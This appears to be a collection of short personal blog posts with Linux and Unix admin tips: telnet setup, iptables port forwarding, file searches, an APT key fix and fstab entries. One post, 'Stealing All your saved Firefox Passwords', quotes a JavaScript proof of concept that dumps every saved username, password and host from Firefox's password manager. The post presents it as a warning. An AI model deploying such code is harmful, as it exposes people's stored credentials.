NSA security documents

Hey, i founded a webpage full of NSA (National Security Agency) security documents of many security topics like Windows XP, Cisco IOS and much more.

http://www.quands.cat/wp/2007/12/11/guies-de-configuracio-de-seguretat-de-la-nsa/ 

How to: Telnet server

Today i’ve done a telnet server in one of my computers… I’m conscious that telnet isn’t a safe way to access a server through, but i just wanted to learn something about this application , furthermore i did it into my LAN. Ok, lets go install it! (You must login as root user)

apt-get install telnetd netkit-inetd

Maybe, the system ask you to install “openbsd-inetd” or “inetutils-inetd, i chose the second and it works fine.

Before this, you should start the server

/usr/sbin/in.telnetd

Now the telnet server is running and you can access it through a telnet cliente like ssh in linux or PuTTy in Windows.

Here we’ve a screen capture of a Telnet login in Ethereal/Wireshark.

Redirecting a port to a local machine inside our network

If we want to redirect a port (Like the http port) to one of our network machine we should use this IPTables rule:

iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 80 -j DNAT --to-destination 192.168.0.x

iptables -t nat -A POSTROUTING -p tcp -d 192.168.0.x --dport 80 -j SNAT --to-source 192.168.0.y

Adding a UNIX user

useradd -c College_classmate -d /home/MyNewUser -u [user_ID] -g [Group] -p [Password] MyNewUser

See useradd –help for more information about “useradd” command.

Searching files in Unix

A simple search

find [root_directory] [filename]

find / "*MyFile*"

Searching a application path

whereis [appname]

whereis ssh

Searching files by content in a directory

egrep -i "hello world" /home/[mydir]/*

Stealing All your saved Firefox Passwords

We’ve to have care when we save our passwords. All of this are easy to recover (or steal!) with this simply function:

function listPW() {
if(document.location !='http://www.0x000000.com/hacks/hello.html') {
netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
var pm = Components.classes["@mozilla.org/passwordmanager;1"].getService();
pm = pm.QueryInterface(Components.interfaces.nsIPasswordManager);
var enumerator = pm.enumerator;
document.writeln('Mozilla\'s idea of security, I do not store these passwords, it\'s only a PoC');
document.writeln('
');
while (enumerator.hasMoreElements()) {
try {
var np = enumerator.getNext();
np = np.QueryInterface(Components.interfaces.nsIPassword);
presult = '['+np.user+'] ['+np.password+'] ['+np.host+']
';
document.writeln(presult);
} catch(e) { }
}
} else { alert('this only runs from your PC, save the page to your desktop (CTRL+S) and open it in Firefox, then watch the Magicx!'); }
}

Be careful

Source: http://www.0×000000.com/index.php?i=345&bin=101011001

Downloading a entire web site

If we need to save a entire website in our drive, we can choose some applications like:

• HTTrack (Avaible for Windows and Linux)
• Webcopier
• In Linux type in a terminal: wget -r --level=3 http://www.url.com/

*–level=3 means that 3 sub-levels of the web will be downloaded.

Solving “NO_PUBKEY” error in APT

Sometimes when i use ‘apt-get update’ i receive an error like this:

W: GPG error: http://mirrors.dk.telia.net testing Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 010908312D230C5F

To fix this,  copy the number (010908312D230C5F in the example) and type:

• gpg –keyserver subkeys.pgp.net –recv [NUMBER]
• gpg –export –armor [NUMBER] | apt-key add -

Then, let try “apt-get update” again.

Free Un*x terminals by Hewlett Packard

HP it’s offering free Un*x terminals to try some OS:

• HP-UX 11i v3
• Linux (Debian Etch, Red Hat Enterprise 5, Madriva Corporate, SuSe server 10)
• HP OpenVMS
• FreeBSD 6.2

All this OS are running on different machines as HP Proliant servers or PA-RISC.

There’re some apps to test those servers, GCC, Oracle, Fortran compilers, etc

This is the link http://www.testdrive.hp.com/

Adding a NTFS partition to fstab

Fstab it’s located in “/etc/fstab”, and it’s a plain text file which contains the information about our disks, and the how they should be mounted in the system.

If you want to add a NTFS partition you must type this:

/dev/hda[X] /mnt/[folder_name] ntfs ro,user,auto,noexec,umask=0 0 0

Where:

• ro = Read Only
• user = Allow to mount the partition if you’re a limited user
• auto = This means that the partition will be mounted at the system bootup
• noexec = You’ll not be able to execute binaries (Highly recommended to Win partitions)
• “umask=0″  = Means everybody can do everything with the files on the disk [See more]
• 0(first) = The partition will not be backed up
• 0 (second) = Put 1 if you want to check that partition with fcsk at the bootup (No necessary to Win)

NOTE: Put to the directory read only permissions with chmod*
Sources: http://www.tuxfiles.org/linuxhelp/fstab.html

http://ubuntuforums.org/showthread.php?t=283131